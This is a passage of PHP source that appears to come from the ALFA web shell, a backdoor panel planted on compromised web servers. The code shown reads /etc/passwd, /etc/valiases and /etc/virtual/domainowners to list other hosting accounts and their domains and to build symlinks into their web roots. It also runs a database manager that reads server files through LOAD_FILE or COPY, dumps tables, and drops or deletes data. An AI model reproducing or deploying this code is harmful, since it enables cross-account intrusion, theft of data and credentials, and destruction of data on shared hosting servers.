@posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain));\r\n\t\t\t\t$owner = $user["name"];\r\n\t\t\t}elseif($can_runcmd){\r\n\t\t\t\t$owner = alfaEx("stat -c \'%U\' /etc/valiases/".$domain,false,false);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(!$anonymous){\r\n\t\tif(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;\r\n\t\t$sympath = str_replace("{user}", $owner, $makepwd);\r\n\t\t$http = "http://".$domain;\r\n\t\tif($state == "passwd"){\r\n\t\t\t$http = "javascript:alert(\'we cant find domain...\')";\r\n\t\t}\r\n\t\techo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);\r\n\t\t$count++;\r\n\t\t$f_black[] = $owner.$domain;\r\n\t}\r\n}\r\nif($anonymous){\r\n\tforeach($anonymous_users as $owner){\r\n\t\t$sympath = str_replace("{user}", $owner, $makepwd);\r\n\t\t$http = "javascript:alert(\'we cant find domain...\')";\r\n\t\techo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);\r\n\t\t$count++;\r\n\t}\r\n}\r\n$cant_symlink = false;\r\n}else{\r\n$is_direct = false;\r\n$makepwd = alfaMakePwd();\r\nif(_alfa_file_exists("/etc/virtual/domainowners")){\r\n\t$makepwd = "/home/{user}/public_html";\r\n\t$is_direct = true;\r\n}\r\n$sole = _alfa_file("/etc/virtual/domainowners");\r\n$count=1;\r\necho $table_header;\r\n$template = \'<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="\'.__ALFA_DATA_FOLDER__.\'/alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>\';\r\nif($sole){\r\n\tforeach($sole as $visible){\r\n\t\tif(@strstr($visible,":")){\r\n\t\t\t$solevisible = explode(\':\', $visible);\r\n\t\t\t$cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);\r\n\t\t\techo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);\r\n\t\t}\r\n\t}\r\n}else{\r\n\t$passwd = _alfa_file("/etc/passwd");\r\n\tif($passwd){\r\n\t\t$html = "";\r\n\t\t$is_named = false;\r\n\t\t$users = array();\r\n\t\t$domains = array();\r\n\t\t$uknowns = array();\r\n\t\tforeach($passwd as $user){\r\n\t\t\t$user = trim($user);\r\n\t\t\t$expl = explode(":", $user);\r\n\t\t\tif((int)$expl[2] < 500)continue;\r\n\t\t\t$users[$expl[0]] = $expl[5];\r\n\t\t}\r\n\t\t$site_domains = @scandir("/etc/virtual/");\r\n\t\tif(!$site_domains){\r\n\t\t\t$site_domains = alfaEx("ls /etc/virtual/");\r\n\t\t\t$site_domains = explode("\\n", $site_domains);\r\n\t\t\tif(!$site_domains){\r\n\t\t\t\t$site_domains = _alfa_file("/etc/named.conf");\r\n\t\t\t\tif($site_domains){$is_named = true;}\r\n\t\t\t}\r\n\t\t}\r\n\t\tforeach($site_domains as $line){\r\n\t\t\tif($is_named){\r\n\t\t\t\tif(@strstr($line, \'zone\')){\r\n\t\t\t\t\tpreg_match_all(\'#zone "(.*)"#\',$line, $data);\r\n\t\t\t\t\t$domain = $data[1][0];\r\n\t\t\t\t\tif(strlen($domain  > 2) && !empty($domain)){\r\n\t\t\t\t\t\t$domains[] = $domain;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\t$domains[] = $line;\r\n\t\t\t}\r\n\t\t}\r\n\t\t$x = 1;\r\n\t\tforeach($users as $user => $home){\r\n\t\t\tforeach($domains as $domain){\r\n\t\t\t\t$user_len = strlen($user) - 1;\r\n\t\t\t\t$sub_domain = str_replace(array("-","."), "", $domain);\r\n\t\t\t\t$five_user = substr($user, 0,$user_len);\r\n\t\t\t\t$five_domain = substr($sub_domain, 0,$user_len);\r\n\t\t\t\tif($five_user == $five_domain){\r\n\t\t\t\t\tif($is_direct){\r\n\t\t\t\t\t\t$cwd = str_replace("{user}", $user, $makepwd);\r\n\t\t\t\t\t}else{\r\n\t\t\t\t\t\t$expl = explode("}/", $makepwd);\r\n\t\t\t\t\t\t$cwd = $home."/".$expl[1];\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$uknowns[$user] = $home;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\t$uknowns = array_unique($uknowns);\r\n\t\tforeach($uknowns as $user => $home){\r\n\t\t\tif($is_direct){\r\n\t\t\t\t$cwd = str_replace("{user}", $user, $makepwd);\r\n\t\t\t}else{\r\n\t\t\t\t$expl = explode("}/", $makepwd);\r\n\t\t\t\t$cwd = $home."/".$expl[1];\r\n\t\t\t}\r\n\t\t\t$html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);\r\n\t\t}\r\n\t\techo($html);\r\n\t}\r\n}\r\necho "</table>";\r\n$cant_symlink = false;\r\n}\r\n}else{\r\n\techo "<pre class=ml1 style=\'margin-top:5px\'><b><font color=\\"#FFFFFF\\">[+] Symlink Function Disabled !</b></font></pre></center>";\r\n\t$cant_symlink = false;\r\n}\r\nif($cant_symlink)echo \'<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>\';\r\necho "</center></table>";\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfasql(){\r\nclass DbClass{\r\npublic $type;\r\npublic $link;\r\npublic $res;\r\npublic $mysqli_connect_error = false;\r\npublic $mysqli_connect_error_msg = "";\r\nfunction __construct($type){\r\n$this->type = $type;\r\n}\r\nfunction connect($host, $user, $pass, $dbname){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nif($this->link = @mysqli_connect($host,$user,$pass,$dbname)){\r\n\treturn true;\r\n}else{\r\n\t$this->mysqli_connect_error = true;\r\n\t$this->mysqli_connect_error_msg = mysqli_connect_error();\r\n\treturn false;\r\n}\r\nbreak;\r\ncase \'pgsql\':\r\n$host = explode(\':\', $host);\r\nif(!$host[1]) $host[1]=5432;\r\nif( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction selectdb($db){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nif(@mysqli_select_db($db))return true;\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction query($str){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn $this->res = @mysqli_query($this->link,$str);\r\nbreak;\r\ncase \'pgsql\':\r\nreturn $this->res = @pg_query($this->link,$str);\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction fetch(){\r\n$res = func_num_args()?func_get_arg(0):$this->res;\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn @mysqli_fetch_assoc($res);\r\nbreak;\r\ncase \'pgsql\':\r\nreturn @pg_fetch_assoc($res);\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction listDbs(){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn $this->query("SHOW databases");\r\nbreak;\r\ncase \'pgsql\':\r\nreturn $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction listTables(){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn $this->res = $this->query(\'SHOW TABLES\');\r\nbreak;\r\ncase \'pgsql\':\r\nreturn $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction error(){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn @mysqli_error($this->link);\r\nbreak;\r\ncase \'pgsql\':\r\nreturn @pg_last_error();\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction setCharset($str){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nif(function_exists(\'mysql_set_charset\'))\r\nreturn @mysqli_set_charset($this->link,$str);\r\nelse\r\n$this->query(\'SET CHARSET \'.$str);\r\nbreak;\r\ncase \'pgsql\':\r\nreturn @pg_set_client_encoding($this->link, $str);\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\nfunction loadFile($str){\r\nswitch($this->type){\r\ncase \'mysql\':\r\nreturn $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\r\nbreak;\r\ncase \'pgsql\':\r\n$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM \'".addslashes($str)."\';select file from solevisible;");\r\n$r=array();\r\nwhile($i=$this->fetch())\r\n$r[] = $i[\'file\'];\r\n$this->query(\'drop table solevisible\');\r\nreturn array(\'file\'=>implode("\\n",$r));\r\nbreak;\r\n}\r\nreturn false;\r\n}\r\n};\r\n$db = new DbClass($_POST[\'type\']);\r\nalfahead();\r\n$form_visibility = "table";\r\nif(isset($_POST[\'sql_host\'])){\r\n\t$connection_db = $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n\tif($connection_db && !empty($_POST[\'sql_base\'])){\r\n\t\t$form_visibility = "none";\r\n\t}\r\n}\r\n$database_list = array();\r\necho "\r\n<div class=\'header\' style=\'min-height:300px;\'>".($form_visibility!="none"?"<center><div class=\'txtfont_header\'>| Sql Manager |</div><p>".getConfigHtml(\'all\')."</p></center><div style=\'text-align:center;margin-bottom: 10px;\'><button class=\'connection-his-btn db-opt-id\' onclick=\'alfaShowConnectionHistory(this);\' mode=\'on\'>Connection History</button><div class=\'connection_history_holder\'></div></div>":"")."\r\n<div class=\'sf\' class=\'db-opt-id\'><table style=\'margin: 0 auto;".($form_visibility=="none"?"display:none;":"")."\' cellpadding=\'2\' cellspacing=\'0\'><tr>\r\n<td><div class=\\"txtfont\\">TYPE</div></td><td><div class=\\"txtfont\\">HOST</div></td><td><div class=\\"txtfont\\">DB USER</div></td><td><div class=\\"txtfont\\">DB PASS</div></td><td><div class=\\"txtfont\\">DB NAME</div></td><td></td></tr><tr>\r\n<td><select name=\'type\'><option value=\'mysql\' selected>mysql</option></select></td>\r\n<td><input type=\'text\' name=\'sql_host\' id=\'db_host\' value=\'". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\'></td>\r\n<td><input type=\'text\' name=\'sql_login\' id=\'db_user\' value=\'". (empty($_POST[\'sql_login\'])?\'\':htmlspecialchars($_POST[\'sql_login\'])) ."\'></td>\r\n<td><input type=\'text\' name=\'sql_pass\' id=\'db_pw\' value=\'". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\'></td><td>";\r\n$tmp = "<input type=\'text\' name=\'sql_base\' id=\'db_name\' value=\'". (empty($_POST[\'sql_base\'])?\'\':htmlspecialchars($_POST[\'sql_base\'])) ."\'>";\r\nif(isset($_POST[\'sql_host\'])){\r\nif($connection_db){\r\n$db->setCharset(\'utf8\');\r\n$db->listDbs();\r\necho "<select name=sql_base><option value=\'\'></option>";\r\nwhile($item = $db->fetch()) {\r\nlist($key, $value) = each($item);\r\n$database_list[] = $value;\r\necho \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n}\r\necho \'</select>\';\r\n}else{\r\n\techo $tmp;\r\n}\r\n}else\r\necho $tmp;\r\n$curr_mysql_id = $_POST[\'current_mysql_id\'];\r\necho "</td>\r\n<td><button onclick=\'fs(this);return false;\' class=\'db-opt-id db-connect-btn\'>Connect</button></td>\r\n<td><input type=\'checkbox\' name=\'sql_count\' value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> <div class=\\"txtfont\\">count the number of rows</div></td>\r\n</tr>\r\n</table>";\r\nif($db->mysqli_connect_error){\r\n\techo \'<div style="text-align: center;font-size: 17px;margin-top: 18px;">\'.$db->mysqli_connect_error_msg.\'</div>\';\r\n}\r\nif(!empty($curr_mysql_id)){\r\n\t$sql_title_db = "";\r\n\tif(!empty($_POST[\'sql_base\'])){\r\n\t\t$sql_title_db = "d.querySelector(\'#tab_".$curr_mysql_id." span\').innerHTML=\'".addslashes($_POST[\'sql_base\'])."\';";\r\n\t}\r\n\techo "<script>mysql_cache[\'".$curr_mysql_id."\'][\'host\']=\'".addslashes($_POST[\'sql_host\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'user\']=\'".addslashes($_POST[\'sql_login\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'pass\']=\'".addslashes($_POST[\'sql_pass\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'db\']=\'".addslashes($_POST[\'sql_base\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'charset\']=\'".addslashes($_POST[\'charset\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'type\']=\'".addslashes($_POST[\'type\'])."\';mysql_cache[\'".$curr_mysql_id."\'][\'count\']=\'".addslashes($_POST[\'sql_count\'])."\';".$sql_title_db."alfaConnectionHistoryUpdate();</script>";\r\n}\r\nif(isset($db) && $db->link){\r\nif(!empty($_POST[\'sql_base\'])){\r\necho "<div class=\'mysql-main\'><div mode=\'block\' onclick=\'alfaMysqlTablePanelCtl(this);\' class=\'tables-panel-ctl db-opt-id\'>&#x3C;&#x3C;</div><div class=\'mysql-tables\'><div><input placeholder=\\"Filter Table\\" style=\'padding: 0;margin-left: 11px;text-align:center;\' type=\'text\' name=\'filter_all\'><button class=\'db-opt-id\' onclick=\'alfaMysqlFilterAllTable(this);return false;\'>Search</button></div><div class=\'block\'><a sql_count=\'".(empty($_POST[\'sql_count\'])?"false":"true")."\' mode=\'closed\' onclick=\'alfaMysqlFilterAllTable(this,true);\' class=\'expander parent-expander db-opt-id\' href=\'javascript:void(0);\'><img src=\'http://solevisible.com/icons/menu/b_plus.png\' title=\'Expand/Collapse All DataBases\' alt=\'Expand/Collapse All DataBases\'></a></div><ul style=\'margin-top: 28px;\'>";\r\nforeach ($database_list as $db_name) {\r\n\techo \'<li><div class="block"><i></i><b></b><a sql_count="\'.(empty($_POST[\'sql_count\'])?"false":"true").\'" db_target="\'.$db_name.\'" onclick="alfaMysqlExpander(this);" class="expander cls-\'.$db_name.\'-expander db-opt-id" href="javascript:void(0);"><img src="http://solevisible.com/icons/menu/\'.($db_name == $_POST[\'sql_base\']?"b_minus.png":"b_plus.png").\'" title="Expand/Collapse" alt="Expand/Collapse"></a></div><span class="db_name">\'.$db_name.\'</span><div class="clearfloat"></div><div db_name="\'.$db_name.\'" mode="\'.($db_name == $_POST[\'sql_base\']?"loaded":"no").\'" class="list_container cls-\'.$db_name.\'"><div>\';\r\n\tif($db_name == $_POST[\'sql_base\']){\r\n\t\t$db->selectdb($_POST[\'sql_base\']);\r\n\t\t$tbls_res = $db->listTables();\r\n\t\techo \'<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" target=".cls-\'.$db_name.\'" placeholder="Filter Table" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>\';\r\n\t\twhile($item = $db->fetch($tbls_res)){\r\n\t\tlist($key, $value) = each($item);\r\n\t\tif(!empty($_POST[\'sql_count\']))\r\n\t\t$n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM `\'.$value.\'`\'));\r\n\t\t$value = htmlspecialchars($value);\r\n\t\techo "<li><div class=\'block\'><i></i><b></b></div><div class=\'tables-row\'><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;<a class=\'db-opt-id\' db_target=\'".$db_name."\' href=\'javascript:void(0);\' onclick=\\"alfaLoadTableData(this,\'".$value."\')\\"><span class=\'mysql_tables\' style=\'font-weight:unset;\'>".$value."</span></a>" . (empty($_POST[\'sql_count\'])?\'&nbsp;\':" <small><span style=\'font-weight:unset;\' class=\'mysql_table_count\'>({$n[\'n\']})</span></small>") . "</div></li>";\r\n\t\t}\r\n\t\techo \'</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" class="db-opt-id" target=".cls-\'.$db_name.\'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" target=".cls-\'.$db_name.\'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" class="db-opt-id" db_target="\'.$db_name.\'" target=".cls-\'.$db_name.\'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>\';\r\n\t}\r\n\techo "</div></li>";\r\n}\r\necho "</ul></div><div class=\'mysql-query-results\'><div class=\'mysql-query-result-tabs\'><div class=\'db-opt-id mysql-query-selected-tab\' target=\'.mysql-query-result-content\' onclick=\'alfaMysqlTabCtl(this);\'>Result</div><div class=\'db-opt-id\' target=\'.mysql-query-form\' onclick=\'alfaMysqlTabCtl(this);\'>Query</div><div class=\'db-opt-id\' target=\'.mysql-search-area\' onclick=\'alfaMysqlTabCtl(this);\'>Search</div><div class=\'db-opt-id\' target=\'.mysql-structure\' onclick=\'alfaMysqlTabCtl(this);\'>Structure</div><div class=\'db-opt-id\' target=\'.mysql-insert-row\' onclick=\'alfaMysqlTabCtl(this);\'>Insert</div><div style=\'display:none;\' class=\'db-opt-id\' target=\'.mysql-edit-row\' onclick=\'alfaMysqlTabCtl(this);\'>Edit</div></div><div class=\'mysql-query-content mysql-insert-row mysql-hide-content\'></div><div class=\'mysql-query-content mysql-edit-row mysql-hide-content\'></div><div class=\'mysql-query-content mysql-search-area mysql-hide-content\'></div><div class=\'mysql-query-content mysql-structure mysql-hide-content\'></div><div class=\'mysql-query-content mysql-query-form mysql-hide-content\'><div style=\'margin-bottom: 5px;\'><span>Query:</span></div><textarea name=\'query\' style=\'width:90%;height:100px\'></textarea><p><div style=\'float:left;margin-left: 30px;\'><input class=\'button db-opt-id\' db_target=\'".$_POST[\'sql_base\']."\' onclick=\'alfaMysqlQuery(this);return false;\' type=\'submit\' value=\' \'></div></p></div><div class=\'mysql-query-content mysql-query-result-content\'><div class=\'mysql-query-result-header\'><div style=\'margin-bottom: 10px;\' class=\'mysql-query-reporter\'></div><div class=\'mysql-query-pager\'></div></div><div class=\'mysql-query-table\'></div></div></form></td></tr>";\r\n}\r\necho "</table></div>";\r\necho "</div>";\r\n}else{\r\necho htmlspecialchars($db->error());\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfaSql_manager_api(){\r\n\t$db = $_POST["alfa1"];\r\n\t$type = $_POST["alfa2"];\r\n\t$sql_count = $_POST["alfa3"] == "true" ? true : false;\r\n\t$db = @json_decode($db, true);\r\n\t$conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);\r\n\t@mysqli_set_charset($conn, "utf8");\r\n\tif($conn){\r\n\t\tif($type == "load_all_tables"){\r\n\t\t\t$tables = array();\r\n\t\t\t$q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN (\'".implode("\',\'", $db["databases"])."\');");\r\n\t\t\t$count = 0;\r\n\t\t\twhile($row = @mysqli_fetch_assoc($q_tables)){\r\n\t\t\t\tif($sql_count){\r\n\t\t\t\t\t$count_q = @mysqli_query($conn, \'SELECT COUNT(*) FROM `\'.$row["table_schema"].\'`.`\'.$row["table_name"].\'`\');\r\n\t\t\t\t\tif($count_q){\r\n\t\t\t\t\t\t$count = @mysqli_fetch_row($count_q);\r\n\t\t\t\t\t\t$count = $count[0];\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t$tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int)$count);\r\n\t\t\t}\r\n\t\t\tforeach($db["databases"] as $db){\r\n\t\t\t\tif(!isset($tables[$db])){\r\n\t\t\t\t\t$tables[$db] = null;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo @json_encode($tables);\r\n\t\t}elseif($type == "dump_drop"){\r\n\t\t\tif($db["mode"] == "drop"){\r\n\t\t\t\tforeach ($db["tables"] as $table) {\r\n\t\t\t\t\t@mysqli_query($conn, "DROP TABLE `".$table."`;");\r\n\t\t\t\t}\r\n\t\t\t\t$tables = array();\r\n\t\t\t\t$q_tables = @mysqli_query($conn, "SHOW TABLES;");\r\n\t\t\t\t$count = 0;\r\n\t\t\t\twhile($row = @mysqli_fetch_array($q_tables)){\r\n\t\t\t\t\tif($sql_count){\r\n\t\t\t\t\t\t$count_q = @mysqli_query($conn, \'SELECT COUNT(*) FROM `\'.$row[0].\'`\');\r\n\t\t\t\t\t\tif($count_q){\r\n\t\t\t\t\t\t\t$count = @mysqli_fetch_row($count_q);\r\n\t\t\t\t\t\t\t$count = $count[0];\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$tables[] = array("name" => $row[0], "count" => (int)$count);\r\n\t\t\t\t}\r\n\t\t\t\techo @json_encode($tables);\r\n\t\t\t}else{\r\n\t\t\t\tif(strlen(alfaEx("mysqldump"))>0){\r\n\t\t\t\t\talfaEx("mysqldump --single-transaction --host=\\"".$db["host"]."\\" --user=\\"".$db["user"]."\\" --password=\\"".$db["pass"]."\\" ".$db["db"]." ".implode(" ", $db["tables"])."  > ".$db["dump_file"]);\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$fp = @fopen($db["dump_file"], "w");\r\n\t\t\t\t\tforeach ($db["tables"] as $table) {\r\n\t\t\t\t\t\t$res = @mysqli_query($conn, \'SHOW CREATE TABLE `\'.$table.\'`\');\r\n\t\t\t\t\t\t$create = @mysqli_fetch_array($res);\r\n\t\t\t\t\t\t$sql = "DROP TABLE IF EXISTS `".$table."`;\\n" . $create[1].";\\n";\r\n\t\t\t\t\t\tif($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t\t$tbl_data = @mysqli_query($conn, \'SELECT * FROM `\'.$table.\'`\');\r\n\t\t\t\t\t\t$head = true;\r\n\t\t\t\t\t\twhile($item = @mysqli_fetch_assoc($tbl_data)){\r\n\t\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\t\tforeach($item as $k=>$v) {\r\n\t\t\t\t\t\t\tif($v == null)\r\n\t\t\t\t\t\t\t$item[$k] = "\'\'";\r\n\t\t\t\t\t\t\telseif(is_numeric($v))\r\n\t\t\t\t\t\t\t$item[$k] = $v;\r\n\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t$item[$k] = "\'".@mysqli_real_escape_string($conn, $v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = "`".$k."`";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tif($head) {\r\n\t\t\t\t\t\t\t$sql = \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\r\n\t\t\t\t\t\t\t$head = false;\r\n\t\t\t\t\t\t\t} else\r\n\t\t\t\t\t\t\t$sql = "\\n\\t,(".implode(", ", $item).\')\';\r\n\t\t\t\t\t\t\tif($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tif(!$head)\r\n\t\t\t\t\t\t\tif($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\techo @json_encode(array("status" => true, "file" => $db["dump_file"]));\r\n\t\t\t}\r\n\t\t}elseif($type == "load_tables"){\r\n\t\t\t$tables = array();\r\n\t\t\t$q_tables = @mysqli_query($conn, "SHOW TABLES;");\r\n\t\t\t$count = 0;\r\n\t\t\twhile($row = @mysqli_fetch_array($q_tables)){\r\n\t\t\t\tif($sql_count){\r\n\t\t\t\t\t$count_q = @mysqli_query($conn, \'SELECT COUNT(*) FROM `\'.$row[0].\'`\');\r\n\t\t\t\t\tif($count_q){\r\n\t\t\t\t\t\t$count = @mysqli_fetch_row($count_q);\r\n\t\t\t\t\t\t$count = $count[0];\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t$tables[] = array("name" => $row[0], "count" => (int)$count);\r\n\t\t\t}\r\n\t\t\techo @json_encode($tables);\r\n\t\t}elseif($type == "alter"){\r\n\t\t\t$db["alter"]["type"] = strtolower($db["alter"]["type"]);\r\n\t\t\t$inputs = $db["alter"]["type"]."(".$db["alter"]["input"].")";\r\n\t\t\t$text_input = array("longtext", "text", "mediumtext", "tinytext");\r\n\t\t\tif(in_array($db["alter"]["type"], $text_input)){\r\n\t\t\t\t$inputs = $db["alter"]["type"];\r\n\t\t\t}\r\n\t\t\t@mysqli_query($conn, "ALTER TABLE `".$db["table"]."` MODIFY COLUMN `".$db["column"]."` " . $inputs);\r\n\t\t\t$error = @mysqli_error($conn);\r\n\t\t\tif($error){\r\n\t\t\t\techo $error;\r\n\t\t\t}else{\r\n\t\t\t\techo "ok";\r\n\t\t\t}\r\n\t\t}elseif($type == "edit" || $type == "delete" || $type == "delete_all"){\r\n\t\t\tif($type == "edit"){\r\n\t\t\t\t$q = @mysqli_query($conn, "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` = \'".addslashes($db["key"])."\' LIMIT 0,1");\r\n\t\t\t\t$row = @mysqli_fetch_assoc($q);\r\n\t\t\t\tif($row){\r\n\t\t\t\t\t$columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = \'".$db["db"]."\' AND `TABLE_NAME` = \'".$db["table"]."\'");\r\n\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t$edit_data = array();\r\n\t\t\t\t\twhile($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){\r\n\t\t\t\t\t\t$input = array("col_type" => $row2["COLUMN_TYPE"]);\r\n\t\t\t\t\t\t$row2["type"] = strtolower($row2["type"]);\r\n\t\t\t\t\t\tswitch($row2["type"]){\r\n\t\t\t\t\t\t\tcase "longtext": case "text": case "mediumtext": case "tinytext":\r\n\t\t\t\t\t\t\t\t$input["tag"] = "textarea";\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\tcase "int": case "smallint": case "bigint": case "tinyint": case "mediumint":\r\n\t\t\t\t\t\t\t\t$input["tag"] = "input";\r\n\t\t\t\t\t\t\t\t$input["type"] = "number";\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\tdefault:\r\n\t\t\t\t\t\t\t\t$input["tag"] = "input";\r\n\t\t\t\t\t\t\t\t$input["type"] = "text";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t$columns[$row2["name"]] = $input;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($row as $key => $v){\r\n\t\t\t\t\t\t$edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, \'UTF-8\'), "type" => $columns[$key]);\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo @json_encode($edit_data);\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\tif($type == "delete_all"){\r\n\t\t\t\t\t$rows = implode("\', \'", $db["rows"]);\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$rows = addslashes($db["key"]);\r\n\t\t\t\t}\r\n\t\t\t\t$query = "DELETE FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` IN (\'".$rows."\')";\r\n\t\t\t\t@mysqli_query($conn, $query);\r\n\t\t\t\t$error = @mysqli_error($conn);\r\n\t\t\t\tif($error){\r\n\t\t\t\t \t$status = false;\r\n\t\t\t\t}else{\r\n\t\t\t\t \t$status = true;\r\n\t\t\t\t}\r\n\t\t\t\techo @json_encode(array("status" => $status, "error" => $error, "query" => $query));\r\n\t\t\t}\r\n\t\t}elseif($type == "update"){\r\n\t\t\t$query = "UPDATE `".$db["db"]."`.`".$db["table"]."` SET ";\r\n\t\t\tforeach($db["data"] as $col => $val){\r\n\t\t\t\t$query .= "`".$col."` = \'".mysqli_real_escape_string($conn, $val)."\',";\r\n\t\t\t}\r\n\t\t\t$query = substr($query, 0, -1);\r\n\t\t    $query .= "WHERE `".$db["col_key"]."` = \'".$db["key"]."\'";\r\n\t\t\t$res = @mysqli_query($conn, $query);\r\n\t\t\techo @json_encode(array("status" => $res, "error" => @mysqli_error($conn)));\r\n\t\t}elseif($type == "insert"){\r\n\t\t\t$query = "INSERT INTO `".$db["db"]."`.`".$db["table"]."` ";\r\n\t\t\tforeach($db["data"] as $col => $val){\r\n\t\t\t\t$cols .= $col . ",";\r\n\t\t\t\t$vals .= "\'".mysqli_real_escape_string($conn, $val)."\',";\r\n\t\t\t}\r\n\t\t\t$cols = substr($cols, 0, -1);\r\n\t\t\t$vals = substr($vals, 0, -1);\r\n\t\t\t$query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";\r\n\t\t\t$res = @mysqli_query($conn, 